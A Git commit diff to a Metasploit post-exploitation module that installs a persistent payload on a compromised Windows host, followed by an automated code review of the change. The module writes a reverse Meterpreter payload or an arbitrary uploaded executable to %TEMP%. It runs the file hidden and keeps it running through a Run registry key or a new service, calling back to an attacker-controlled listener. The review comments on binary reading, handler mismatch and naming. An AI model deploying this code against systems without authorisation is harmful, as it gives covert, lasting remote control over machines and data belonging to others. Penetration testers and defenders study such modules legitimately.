Apply feature #6074

unstable
sinn3r 2011-12-12 12:03:34 -06:00
parent 4e95eb5d34
commit 5ba5bbf077
1 changed files with 98 additions and 43 deletions


@ -27,19 +27,28 @@ class Metasploit3 < Msf::Post
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer', 'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{ 'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup at user logon or system startup depending on privilege and selected startup
method. method.
},
'License' => MSF_LICENSE, REXE mode will transfer a binary of your choosing to remote host to be
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'], used as a payload.
'Version' => '$Revision$', },
'Platform' => [ 'windows' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' =>
)) [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Merlyn drforbin Cousins <drforbin6[at]gmail.com>'
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'Actions' => [['TEMPLATE'], ['REXE']],
'DefaultAction' => 'TEMPLATE',
'SessionTypes' => [ 'meterpreter' ]
))
register_options( register_options(
[ [
@ -49,6 +58,9 @@ class Metasploit3 < Msf::Post
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]), OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]),
OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]), OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']), OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']),
OptString.new('REXE',[false, 'The remote executable to use.','']),
OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
OptString.new('ACTION',[true, 'Use TEMPLATE or REXE mode.','TEMPLATE']),
OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']]) OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']])
], self.class) ], self.class)
@ -57,7 +69,6 @@ class Metasploit3 < Msf::Post
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]), OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]), OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']), OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']),
], self.class) ], self.class)
end end
@ -67,6 +78,8 @@ class Metasploit3 < Msf::Post
print_status("Running module against #{sysinfo['Computer']}") print_status("Running module against #{sysinfo['Computer']}")
# Set vars # Set vars
rexe = datastore['REXE']
rexename = datastore['REXENAME']
lhost = datastore['LHOST'] lhost = datastore['LHOST']
lport = datastore['LPORT'] lport = datastore['LPORT']
opts = datastore['OPTIONS'] opts = datastore['OPTIONS']
@ -77,37 +90,56 @@ class Metasploit3 < Msf::Post
host,port = session.tunnel_peer.split(':') host,port = session.tunnel_peer.split(':')
payload = "windows/meterpreter/reverse_tcp" payload = "windows/meterpreter/reverse_tcp"
# Check that if a template is provided that it actually exists if datastore['ACTION'] == 'TEMPLATE'
if datastore['TEMPLATE'] # Check that if a template is provided that it actually exists
if not ::File.exists?(datastore['TEMPLATE']) if datastore['TEMPLATE']
print_error "Template PE File does not exists!" if not ::File.exists?(datastore['TEMPLATE'])
return print_error "Template PE File does not exists!"
else return
template_pe = datastore['TEMPLATE'] else
template_pe = datastore['TEMPLATE']
end
end end
# Set the proper payload
case datastore['STARTUP']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
script_on_target = write_script_to_target(script)
else
if datastore['REXE'].nil? or datastore['REXE'].empty?
print_error("Please define REXE")
return
end
if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
print_error("Please define REXENAME")
return
end
if not ::File.exist?(datastore['REXE'])
print_error("Rexe file does not exist!")
return
end
raw = create_payload_from_file(rexe)
script_on_target = write_exe_to_target(raw,rexename)
end end
# Set the proper payload
case datastore['STARTUP']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
# Start handler if set # Start handler if set
create_multihand(payload, lhost, lport) if datastore['HANDLER'] create_multihand(payload, lhost, lport) if datastore['HANDLER']
# Write script to %TEMP% on target
script_on_target = write_script_to_target(script)
# Initial execution of script # Initial execution of script
target_exec(script_on_target) target_exec(script_on_target)
@ -119,6 +151,7 @@ class Metasploit3 < Msf::Post
when /SERVICE/i when /SERVICE/i
install_as_service(script_on_target) install_as_service(script_on_target)
end end
clean_rc = log_file() clean_rc = log_file()
file_local_write(clean_rc,@clean_up_rc) file_local_write(clean_rc,@clean_up_rc)
print_status("Cleanup Meterpreter RC File: #{clean_rc}") print_status("Cleanup Meterpreter RC File: #{clean_rc}")
@ -291,7 +324,9 @@ class Metasploit3 < Msf::Post
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def target_exec(script_on_target) def target_exec(script_on_target)
print_status("Executing script #{script_on_target}") print_status("Executing script #{script_on_target}")
proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) proc = datastore['ACTION'] == 'REXE' ? session.sys.process.execute(script_on_target, nil, {'Hidden' => true})\
: session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
print_good("Agent executed with PID #{proc.pid}") print_good("Agent executed with PID #{proc.pid}")
@clean_up_rc << "kill #{proc.pid}\n" @clean_up_rc << "kill #{proc.pid}\n"
return proc.pid return proc.pid
@ -305,7 +340,6 @@ class Metasploit3 < Msf::Post
if(key) if(key)
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
#file_local_write(@clean_up_rc, "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v #{nam}\n")
else else
print_error("Error: failed to open the registry key for writing") print_error("Error: failed to open the registry key for writing")
end end
@ -313,14 +347,35 @@ class Metasploit3 < Msf::Post
# Function to install payload as a service # Function to install payload as a service
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def install_as_service(script_on_target) def install_as_service(script_on_target)
if not is_uac_enabled? or is_admin? if is_system? or is_admin?
print_status("Installing as service..") print_status("Installing as service..")
nam = Rex::Text.rand_text_alpha(rand(8)+8) nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating service #{nam}") print_status("Creating service #{nam}")
service_create(nam, nam, "cscript \"#{script_on_target}\"") datastore['ACTION'] == 'REXE' ? service_create(nam, nam, "cmd /c \"#{script_on_target}\"") : service_create(nam, nam, "cscript \"#{script_on_target}\"")
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n" @clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
else else
print_error("Insufficient privileges to create service") print_error("Insufficient privileges to create service")
end end
end end
end
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
return ::IO.read(exec)
end
end
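Review bot: `create_payload_from_file` reads the executable with `::IO.read(exec)`, which opens the file in text mode (newline translation can corrupt a PE when the framework itself runs on Windows) and, being `IO.read` rather than `File.read`, treats a path beginning with `|` as a command to spawn; `return ::File.binread(exec)` avoids both. In the REXE branch of `run` the `payload` variable still holds its default `windows/meterpreter/reverse_tcp`, so `create_multihand(payload, lhost, lport) if datastore['HANDLER']` (HANDLER defaults to true) starts a listener that need not match the supplied executable — it should probably be skipped, or derived from PAYLOAD_TYPE, in that mode. `write_exe_to_target` names its parameter and local `vbs`/`tempvbs` and reports "Persistent Script written", which is misleading for an arbitrary binary; `def write_exe_to_target(exe, rexename)` with `print_good("Executable written to #{remote_path}")` would read correctly. `run` starts and ends outside the hunk.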